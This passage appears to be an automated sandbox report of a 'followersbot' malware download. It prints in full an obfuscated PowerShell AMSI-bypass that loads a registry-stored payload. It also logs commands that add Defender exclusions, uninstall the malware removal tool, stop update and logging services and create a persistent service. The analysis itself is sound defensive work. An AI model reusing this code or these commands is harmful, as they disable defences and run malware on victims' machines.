$_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+'i'+'n'+'3'+'2'+''+[Char](46)+'U'+'n'+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+'i'+'v'+''+'e'+''+'M'+''+[Char](101)+''+[Char](116)+'hod'+[Char](115)+'');$rQBPZBFvyUurXj=$kOKbJiaYMLkQT.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'P'+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c,S'+'t'+''+[Char](97)+'t'+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EVZUuzjgWrLikZEaeyU=jsBBwFSiMSOA @([String])([IntPtr]);$orpEguWPHkXPZXrXjbVVBO=jsBBwFSiMSOA @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IOkfBEGHQYW=$kOKbJiaYMLkQT.GetMethod(''+'G'+'e'+'t'+''+'M'+'o'+'d'+'ul'+[Char](101)+'H'+[Char](97)+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+'l'+''+[Char](51)+''+[Char](50)+''+'.'+'d'+'l'+''+'l'+'')));$rUlkBNhpIGipZg=$rQBPZBFvyUurXj.Invoke($Null,@([Object]$IOkfBEGHQYW,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+''+[Char](98)+'r'+[Char](97)+'ry'+[Char](65)+'')));$ofwiIbrtKmiJKaSTR=$rQBPZBFvyUurXj.Invoke($Null,@([Object]$IOkfBEGHQYW,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'P'+'r'+''+[Char](111)+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$pHaTkJQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rUlkBNhpIGipZg,$EVZUuzjgWrLikZEaeyU).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$ASBwPxmhZsbsjPPRa=$rQBPZBFvyUurXj.Invoke($Null,@([Object]$pHaTkJQ,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+'er')));$ewTJZjpilC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ofwiIbrtKmiJKaSTR,$orpEguWPHkXPZXrXjbVVBO).Invoke($ASBwPxmhZsbsjPPRa,[uint32]8,4,[ref]$ewTJZjpilC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ASBwPxmhZsbsjPPRa,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ofwiIbrtKmiJKaSTR,$orpEguWPHkXPZXrXjbVVBO).Invoke($ASBwPxmhZsbsjPPRa,[uint32]8,0x20,[ref]$ewTJZjpilC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue('di'+[Char](97)+''+'l'+''+[Char](101)+'r'+'s'+'t'+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:7068 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2956
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:iDHfkoMYkNLb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QsmjiEJnYbJzNN,[Parameter(Position=1)][Type]$YWzTSnRgNX)$DilHVAVClKq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'ef'+[Char](108)+''+[Char](101)+''+[Char](99)+'ted'+'D'+'e'+[Char](108)+''+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+'dul'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+'l'+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](65)+'ut'+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$DilHVAVClKq.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+'c'+'i'+''+'a'+'lN'+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+'ub'+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$QsmjiEJnYbJzNN).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+'d'+'');$DilHVAVClKq.DefineMethod(''+[Char](73)+''+'n'+''+'v'+'o'+'k'+''+'e'+'',''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+''+'d'+'eB'+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'wSl'+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+'',$YWzTSnRgNX,$QsmjiEJnYbJzNN).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $DilHVAVClKq.CreateType();}$ycRQcpyqZDPil=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+'t'+''+'e'+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+'2'+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+'fe'+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+'d'+'s');$KkyKndUTItPXvG=$ycRQcpyqZDPil.GetMethod(''+'G'+'e'+[Char](116)+'Pro'+'c'+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'ess',[Reflection.BindingFlags]('Pu'+[Char](98)+'l'+'i'+''+[Char](99)+','+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UVbndFTogdwGxvFnyAt=iDHfkoMYkNLb @([String])([IntPtr]);$zCwhPmYmctrvPRsuRzyVxM=iDHfkoMYkNLb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uHiiOMqiOqk=$ycRQcpyqZDPil.GetMethod('G'+[Char](101)+'t'+[Char](77)+'od'+'u'+'l'+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'rn'+'e'+'l'+'3'+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$QyKHXnkBaPmncH=$KkyKndUTItPXvG.Invoke($Null,@([Object]$uHiiOMqiOqk,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+'L'+'i'+'b'+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$XcLbDrsjcythStgYh=$KkyKndUTItPXvG.Invoke($Null,@([Object]$uHiiOMqiOqk,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+'l'+[Char](80)+'r'+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$VwTyIoZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QyKHXnkBaPmncH,$UVbndFTogdwGxvFnyAt).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+[Char](100)+''+'l'+''+[Char](108)+'');$ahOoZlrjRInzsvYNc=$KkyKndUTItPXvG.Invoke($Null,@([Object]$VwTyIoZ,[Object]('A'+[Char](109)+''+'s'+''+'i'+''+'S'+'c'+'a'+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$QHEEOMZuNl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XcLbDrsjcythStgYh,$zCwhPmYmctrvPRsuRzyVxM).Invoke($ahOoZlrjRInzsvYNc,[uint32]8,4,[ref]$QHEEOMZuNl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ahOoZlrjRInzsvYNc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XcLbDrsjcythStgYh,$zCwhPmYmctrvPRsuRzyVxM).Invoke($ahOoZlrjRInzsvYNc,[uint32]8,0x20,[ref]$QHEEOMZuNl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'FT'+'W'+''+'A'+'R'+'E'+'').GetValue(''+[Char](100)+'ialers'+'t'+''+'a'+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:5664 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5724
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1424
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1452
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1644
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3116
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
- Modifies Internet Explorer settings
PID:1860 -
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2fc 0x3202⤵
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2040
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2060
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2180
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2372
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Suspicious use of UnmapMainImage
PID:2636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2708
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2780
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3452
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3536 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://bit.ly/followersbot_rblx2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x124,0x134,0x7ff9a64a46f8,0x7ff9a64a4708,0x7ff9a64a47183⤵PID:4420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:23⤵PID:3752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:1620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:83⤵PID:1688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:13⤵PID:5076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:13⤵PID:4784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:13⤵PID:4928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5064 /prefetch:83⤵PID:3404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6268 /prefetch:83⤵PID:4056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
PID:4020 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x27c,0x280,0x284,0x120,0x288,0x7ff645495460,0x7ff645495470,0x7ff6454954804⤵PID:3196
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6268 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:13⤵PID:2848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:13⤵PID:376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:13⤵PID:3400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:13⤵PID:4576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4968 /prefetch:83⤵PID:1220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:13⤵PID:976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6736 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:4152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5060 /prefetch:23⤵PID:3652
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\followersbot\" -ad -an -ai#7zMap30093:86:7zEvent160322⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5604
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\followersbot\FOLLOWERBOTSTART.bat" "2⤵PID:5800
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5856
-
-
C:\Users\Admin\Downloads\followersbot\9SHCODL.exe"C:\Users\Admin\Downloads\followersbot\\9SHCODL.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5904 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6108
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:5420
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:968
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:5432
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:4684
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:4520
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:5196
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:4492
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:5532
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "HIUOFKBL"4⤵
- Launches sc.exe
PID:648
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "HIUOFKBL" binpath= "C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe" start= "auto"4⤵
- Launches sc.exe
PID:5160
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:2888
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "HIUOFKBL"4⤵
- Launches sc.exe
PID:2664
-
-
-
C:\Windows\system32\timeout.exetimeout /t 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:3564
-
-
C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"C:\Users\Admin\Downloads\followersbot\\A9LDCODL.exe"3⤵
- Loads dropped DLL
PID:6028 -
